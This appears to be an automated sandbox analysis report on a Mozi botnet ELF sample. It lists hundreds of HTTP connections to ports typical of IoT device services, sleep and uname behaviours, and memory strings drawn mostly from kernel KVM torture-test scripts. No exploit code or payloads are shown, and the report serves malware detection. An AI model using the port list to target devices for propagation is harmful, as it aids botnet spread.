                            Source: unknownNetwork traffic detected: HTTP traffic on port 46800 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52874 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46072 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39358 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43712 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54614 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43036 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44084 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40594 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43522 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34386 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35982 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44878 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34398 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43264 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53016 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48472 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47070 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46460 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43570 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53070 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33282 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56370 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54622 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56536 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36022 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48590 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40310 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55104 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59994 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38878 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58554 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42974 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43964 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58830 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38672 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53152 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43906 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34274 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50670 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52068 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39030 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40118 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55826 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58080 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43052 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52260 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35326 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53504 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60212 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47490 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44680 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47872 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33010 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34624 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47318 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49140 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34124 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53444 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43744 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33794 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57864 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60022 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46356 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35080 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53870 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38240 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34410 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36330 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53422 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40282 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55292 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32998 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57580 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54212 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43310 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34030 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40350 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47940 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55052 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48320 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56468 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54848 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34148 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33242 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55704 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57986 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56624 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46816 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35852 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44556 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43350 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37798 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39746 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45444 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40894 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51254 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37160 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35160 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58566 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43850 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42008 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50474 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52562 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54514 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48006 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43962 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59508 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54706 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40162 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43064 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32890 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60352 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56132 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48988 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33688 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48784 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40274 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33902 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51794 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42406 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43336 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34088 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48338 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42714 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42532 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37456 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53990 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59212 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60028 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42368 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51602 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47074 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54676 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51234 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58670 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34872 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50342 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41506 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37748 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54904 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44984 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33104 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55108 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43758 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53152 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46472 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47524 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47950 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55802 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36440 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48208 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48384 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48608 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55342 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45408 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60762 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59042 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46754 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54796 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34260 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54140 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53990 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36566 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48442 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34694 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46440 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35058 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51046 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40862 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51180 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57288 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44498 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59862 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35320 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55232 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55534 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51150 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34580 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47506 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40914 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51734 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58488 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43774 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54530 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41488 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54682 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39918 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34310 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49020 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53840 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47910 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59378 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58980 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33444 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53558 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36536 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56948 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35234 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37396 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35016 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60192 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43100 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36248 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38884 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46834 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56980 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52114 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37592 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60142 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48468 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40308 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54776 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54326 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33372 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51030 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36430 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58464 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42920 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36680 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39618 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38210 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40260 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42956 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47264 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34726 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52098 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38550 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53492 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40540 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37970 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52048 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52080 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44978 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39762 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54634 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33884 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53668 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56222 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42566 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55628 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57650 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60572 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58868 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50652 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40956 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60148 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46420 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35918 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54424 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60448 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53158 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51970 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35524 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53432 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41916 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46530 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37110 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55396 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60036 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39766 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35814 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42630 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60406 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32896 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45148 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56906 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34408 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37162 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40294 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44398 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49486 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49402 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36336 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33408 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46476 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51024 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40074 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58920 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43014 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38378 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54464 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44852 -> 8443
                            Source: /tmp/Mozi.m.elf (PID: 6282)Sleeps longer then 60s: 600.0sJump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6226)Queries kernel information via 'uname': Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6230)Queries kernel information via 'uname': Jump to behavior
                            Source: /tmp/Mozi.m.elf (PID: 6268)Queries kernel information via 'uname': Jump to behavior
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: ( $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append "$qemu_append $boot_args" > $resdir/qemu-output 2>&1 & echo $! > $resdir/qemu_pid; wait `cat $resdir/qemu_pid`; echo $? > $resdir/qemu-retval ) &
                            Source: functions.sh2.14.drBinary or memory string: qemu-system-ppc64)
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                            Source: kvm.sh.14.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: echo Monitoring qemu job at yet-as-unknown pid
                            Source: kvm.sh.14.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
                            Source: functions.sh2.14.drBinary or memory string: identify_qemu_append () {
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: QEMU="`identify_qemu vmlinux`"
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$resdir/console.log"`"
                            Source: kvm.sh.14.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
                            Source: functions.sh2.14.drBinary or memory string: identify_qemu_args () {
                            Source: functions.sh2.14.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: # Generate -smp qemu argument.
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
                            Source: functions.sh2.14.drBinary or memory string: # Output arguments for the qemu "-append" string based on CPU type
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
                            Source: functions.sh2.14.drBinary or memory string: echo qemu-system-ppc64
                            Source: functions.sh2.14.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
                            Source: functions.sh2.14.drBinary or memory string: echo qemu-system-aarch64
                            Source: kvm-recheck-rcu.sh.14.drBinary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                            Source: functions.sh2.14.drBinary or memory string: # identify_qemu_append qemu-cmd
                            Source: Mozi.m.elf, 6226.1.00007ffd3c67c000.00007ffd3c69d000.rw-.sdmp, Mozi.m.elf, 6228.1.00007ffd3c67c000.00007ffd3c69d000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/Mozi.m.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Mozi.m.elf
                            Source: kvm.sh.14.drBinary or memory string: print "needqemurun="
                            Source: functions.sh2.14.drBinary or memory string: identify_qemu_vcpus () {
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: if test $commandcompleted -eq 0 -a -n "$qemu_pid"
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: if test -z "$qemu_pid" || kill -0 "$qemu_pid" > /dev/null 2>&1
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $resdir/console.log
                            Source: kvm.sh.14.drBinary or memory string: print "\tneedqemurun=1"
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: qemu_args=$5
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: # Generate qemu -append arguments
                            Source: Mozi.m.elf, 6226.1.00007ffd3c67c000.00007ffd3c69d000.rw-.sdmp, Mozi.m.elf, 6228.1.00007ffd3c67c000.00007ffd3c69d000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
                            Source: functions.sh2.14.drBinary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
                            Source: kvm.sh.14.drBinary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
                            Source: functions.sh2.14.drBinary or memory string: echo qemu-system-i386
                            Source: functions.sh2.14.drBinary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
                            Source: kvm.sh.14.drBinary or memory string: print "if test -n \"$needqemurun\""
                            Source: functions.sh2.14.drBinary or memory string: echo qemu-system-x86_64
                            Source: functions.sh2.14.drBinary or memory string: identify_qemu () {
                            Source: parse-console.sh.14.drBinary or memory string: print_warning Console output contains nul bytes, old qemu still running?
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: sleep 10 # Give qemu's pid a chance to reach the file
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: kill -KILL $qemu_pid
                            Source: functions.sh2.14.drBinary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
                            Source: functions.sh2.14.drBinary or memory string: qemu-system-aarch64)
                            Source: kvm.sh.14.drBinary or memory string: checkarg --qemu-args "(qemu arguments)" $# "$2" '^-' '^error'
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: echo Unknown PID, cannot kill qemu command
                            Source: functions.sh2.14.drBinary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
                            Source: kvm-recheck-lock.sh.14.drBinary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
                            Source: functions.sh2.14.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: echo $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
                            Source: functions.sh2.14.drBinary or memory string: qemu-system-x86_64|qemu-system-i386|qemu-system-aarch64)
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: echo Grace period for qemu job at pid $qemu_pid
                            Source: functions.sh2.14.drBinary or memory string: qemu-system-x86_64)
                            Source: functions.sh2.14.drBinary or memory string: qemu-system-aarch64)
                            Source: functions.sh2.14.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                            Source: functions.sh2.14.drBinary or memory string: # Returns our best guess as to which qemu command is appropriate for
